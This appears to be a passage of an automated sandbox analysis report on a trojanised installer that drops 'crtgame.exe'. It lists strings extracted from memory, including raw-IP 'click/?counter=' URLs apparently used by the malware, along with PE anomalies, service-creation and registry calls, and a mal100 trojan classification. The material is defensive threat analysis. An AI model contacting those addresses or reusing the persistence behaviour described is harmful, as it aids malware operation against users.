                  Source: crtgame.exe, 00000007.00000002.3299995322.0000000000902000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3299995322.000000000093E000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3299995322.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3299995322.0000000000948000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde
                  Source: crtgame.exe, 00000007.00000002.3299995322.000000000093E000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3299995322.0000000000948000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde
                  Source: crtgame.exe, 00000007.00000002.3299995322.0000000000902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.206.129/en-GB
                  Source: crtgame.exe, 00000007.00000002.3299995322.0000000000902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.232.249.187/
                  Source: crtgame.exe, 00000007.00000002.3299995322.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde2
                  Source: is-DTLCM.tmp.1.drString found in binary or memory: http://LosslessAudio.org/0
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0
                  Source: is-ODQUV.tmp.1.drString found in binary or memory: http://code.google.com/p/mp4v2D
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                  Source: is-GN0SC.tmp.1.drString found in binary or memory: http://lame.sf.net
                  Source: is-GN0SC.tmp.1.drString found in binary or memory: http://lame.sf.net32bits
                  Source: is-6S6NV.tmp.1.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.dr, is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0O
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0Q
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: AGcC2uK0El.tmp, AGcC2uK0El.tmp, 00000001.00000000.2055415237.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AGcC2uK0El.tmp.0.dr, is-785C0.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                  Source: is-GN0SC.tmp.1.drString found in binary or memory: http://www.mp3dev.org/
                  Source: is-GN0SC.tmp.1.drString found in binary or memory: http://www.mp3dev.org/ID3Error
                  Source: is-JISVL.tmp.1.drString found in binary or memory: http://www.mpg123.de
                  Source: AGcC2uK0El.exe, 00000000.00000003.2054765577.0000000002380000.00000004.00001000.00020000.00000000.sdmp, AGcC2uK0El.exe, 00000000.00000003.2054950745.0000000002088000.00000004.00001000.00020000.00000000.sdmp, AGcC2uK0El.tmp, AGcC2uK0El.tmp, 00000001.00000000.2055415237.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AGcC2uK0El.tmp.0.dr, is-785C0.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
                  Source: AGcC2uK0El.exe, 00000000.00000003.2054765577.0000000002380000.00000004.00001000.00020000.00000000.sdmp, AGcC2uK0El.exe, 00000000.00000003.2054950745.0000000002088000.00000004.00001000.00020000.00000000.sdmp, AGcC2uK0El.tmp, 00000001.00000000.2055415237.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AGcC2uK0El.tmp.0.dr, is-785C0.tmp.1.drString found in binary or memory: http://www.remobjects.com/psU
                  Source: is-E5NVS.tmp.1.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: is-H6A9P.tmp.1.drString found in binary or memory: https://gcc.gnu.org/bugs/):
                  Source: is-ODQUV.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn
                  Source: is-ODQUV.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn/trunk
                  Source: is-ODQUV.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn/trunkrepository
                  Source: is-ODQUV.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svnrepository
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: https://sectigo.com/CPS0
                  Source: is-5JD36.tmp.1.drString found in binary or memory: https://streams.videolan.org/upload/
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: https://www.ssl.com/repository0

                  System Summary

                  barindex
                  Source: is-ULG4P.tmp.1.drStatic PE information: section name:
                  Source: is-ULG4P.tmp.1.drStatic PE information: section name:
                  Source: is-EATSP.tmp.1.drStatic PE information: section name:
                  Source: is-EATSP.tmp.1.drStatic PE information: section name:
                  Source: is-JORH4.tmp.1.drStatic PE information: section name:
                  Source: is-JORH4.tmp.1.drStatic PE information: section name:
                  Source: is-RGK44.tmp.1.drStatic PE information: section name:
                  Source: is-6ND5B.tmp.1.drStatic PE information: section name:
                  Source: is-6ND5B.tmp.1.drStatic PE information: section name:
                  Source: is-PJ8MN.tmp.1.drStatic PE information: section name:
                  Source: is-PJ8MN.tmp.1.drStatic PE information: section name:
                  Source: is-RJI5O.tmp.1.drStatic PE information: section name:
                  Source: is-JU8A8.tmp.1.drStatic PE information: section name:
                  Source: is-JU8A8.tmp.1.drStatic PE information: section name:
                  Source: is-JU8A8.tmp.1.drStatic PE information: section name:
                  Source: is-930UV.tmp.1.drStatic PE information: section name:
                  Source: is-930UV.tmp.1.drStatic PE information: section name:
                  Source: is-8DLTN.tmp.1.drStatic PE information: section name:
                  Source: is-8DLTN.tmp.1.drStatic PE information: section name:
                  Source: is-8DLTN.tmp.1.drStatic PE information: section name:
                  Source: is-M07BP.tmp.1.drStatic PE information: section name:
                  Source: is-M07BP.tmp.1.drStatic PE information: section name:
                  Source: is-FBHNA.tmp.1.drStatic PE information: section name:
                  Source: is-FBHNA.tmp.1.drStatic PE information: section name:
                  Source: is-5QDBA.tmp.1.drStatic PE information: section name:
                  Source: is-5QDBA.tmp.1.drStatic PE information: section name:
                  Source: is-5QDBA.tmp.1.drStatic PE information: section name:
                  Source: is-IM6II.tmp.1.drStatic PE information: section name:
                  Source: is-IM6II.tmp.1.drStatic PE information: section name:
                  Source: is-P33NB.tmp.1.drStatic PE information: section name:
                  Source: is-P33NB.tmp.1.drStatic PE information: section name:
                  Source: is-P33NB.tmp.1.drStatic PE information: section name:
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0042F394 NtdllDefWindowProc_A,1_2_0042F394
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00423B94 NtdllDefWindowProc_A,1_2_00423B94
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004125E8 NtdllDefWindowProc_A,1_2_004125E8
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0045678C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_0045678C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00477568 NtdllDefWindowProc_A,1_2_00477568
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0042E7A8: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E7A8
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00454B00
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_0040840C0_2_0040840C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00466ABC1_2_00466ABC
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0047EFD81_2_0047EFD8
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0043D5A41_2_0043D5A4
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0046F68C1_2_0046F68C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0048C1101_2_0048C110
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004301D01_2_004301D0
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004442C41_2_004442C4
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0045E7EC1_2_0045E7EC
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0045A8941_2_0045A894
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004449BC1_2_004449BC
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00468B441_2_00468B44
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00434B1C1_2_00434B1C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00430D5C1_2_00430D5C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00444DC81_2_00444DC8
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00484ED41_2_00484ED4
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0045101C1_2_0045101C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00443D1C1_2_00443D1C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00485E081_2_00485E08
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00433E181_2_00433E18
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_02471EE01_2_02471EE0
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_024711401_2_02471140
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_024716B01_2_024716B0
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_004010515_2_00401051
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_00406CE75_2_00406CE7
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_00401CBD5_2_00401CBD
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C45F147_2_02C45F14
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C4EA067_2_02C4EA06
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C648E97_2_02C648E9
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C5E0657_2_02C5E065
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C628747_2_02C62874
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C599447_2_02C59944
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C45ED37_2_02C45ED3
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C5A6FA7_2_02C5A6FA
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C45E9B7_2_02C45E9B
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C64E607_2_02C64E60
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C5D7597_2_02C5D759
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C57F027_2_02C57F02
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C5DC4D7_2_02C5DC4D
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C7B85F7_2_02C7B85F
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C7B8067_2_02C7B806
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C7BE577_2_02C7BE57
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C7BE1D7_2_02C7BE1D
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: String function: 02C64DF0 appears 137 times
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: String function: 02C585A0 appears 37 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: String function: 004458F8 appears 59 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: String function: 00405964 appears 110 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: String function: 00445628 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: String function: 00408C14 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: String function: 00406ACC appears 39 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: String function: 00403400 appears 61 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: String function: 00433D30 appears 32 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: String function: 004078FC appears 43 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: String function: 00457114 appears 70 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: String function: 00403494 appears 82 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: String function: 004529A4 appears 91 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: String function: 00403684 appears 218 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: String function: 00456F08 appears 91 times
                  Source: AGcC2uK0El.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: AGcC2uK0El.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: AGcC2uK0El.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                  Source: AGcC2uK0El.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: AGcC2uK0El.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: crtgame.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: is-785C0.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: is-785C0.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                  Source: is-785C0.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: is-785C0.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: SHelperTrack.exe.5.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: is-PJQ9V.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-O51E5.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-6S6NV.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-D10RQ.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-8JJ67.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-5JD36.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-E5NVS.tmp.1.drStatic PE information: Number of sections : 18 > 10
                  Source: AGcC2uK0El.exe, 00000000.00000003.2054765577.0000000002380000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs AGcC2uK0El.exe
                  Source: AGcC2uK0El.exe, 00000000.00000003.2054950745.0000000002088000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs AGcC2uK0El.exe
                  Source: AGcC2uK0El.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: crtgame.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: _RegDLL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: SHelperTrack.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: is-ULG4P.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9964533211297071
                  Source: is-PJ8MN.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9976058467741935
                  Source: is-JU8A8.tmp.1.drStatic PE information: Section: ZLIB complexity 0.995148689516129
                  Source: is-930UV.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9908203125
                  Source: is-FBHNA.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9903624487704918
                  Source: is-5QDBA.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9891526442307692
                  Source: is-2V0OO.tmp.1.drBinary or memory string: ?..la..dll.Unknown error %u occurred.sln
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@15/128@7/3
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C502C0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,7_2_02C502C0
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00454B00
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00455328 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455328
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: lstrcmpiW,GetModuleHandleA,GetModuleFileNameA,GetModuleHandleA,GetModuleFileNameW,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,CreateDirectoryA,CopyFileA,OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_00402546
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0046D118 GetVersion,CoCreateInstance,1_2_0046D118
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409BEC
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_004026EE GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,CreateThread,WaitForSingleObject,ExitProcess,StartServiceCtrlDispatcherA,5_2_004026EE
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_004026EE GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,CreateThread,WaitForSingleObject,ExitProcess,StartServiceCtrlDispatcherA,5_2_004026EE
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGameJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_03
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeMutant created: \Sessions\1\BaseNamedObjects\AnyMediaPlayer
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeFile created: C:\Users\user\AppData\Local\Temp\is-AA37T.tmpJump to behavior
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: is-E5NVS.tmp.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: is-E5NVS.tmp.1.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                  Source: is-E5NVS.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: is-E5NVS.tmp.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: is-E5NVS.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: is-E5NVS.tmp.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: is-E5NVS.tmp.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: is-E5NVS.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: is-E5NVS.tmp.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: AGcC2uK0El.exeVirustotal: Detection: 58%
                  Source: AGcC2uK0El.exeReversingLabs: Detection: 55%
